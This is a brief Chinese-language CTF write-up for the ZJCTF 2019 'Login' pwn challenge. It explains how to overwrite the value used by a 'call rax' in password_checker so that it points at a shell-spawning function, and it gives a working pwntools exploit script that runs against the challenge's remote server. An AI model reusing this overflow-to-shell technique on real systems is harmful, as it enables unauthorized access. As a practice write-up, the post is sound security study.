[ZJCTF 2019]Login

exp 脚本

  C++写的程序,逆向分析有点费劲。注意到 password_checker 有 call rax 指令,倒推 rax 的来源,在 main 函数中把 rax 的来源覆盖为漏洞函数的地址即可 get shell

from pwn import *

io = remote('node3.buuoj.cn',27283)

shell = 0x400e88
io.sendlineafter(': ','admin')
io.sendlineafter(': ','2jctf_pa5sw0rd'+'\x00'*58+p64(shell))

io.interactive()

感谢 keer 师傅的指点!

posted @ 2020-02-29 19:40  PwnKi  阅读(1157)  评论(0编辑  收藏  举报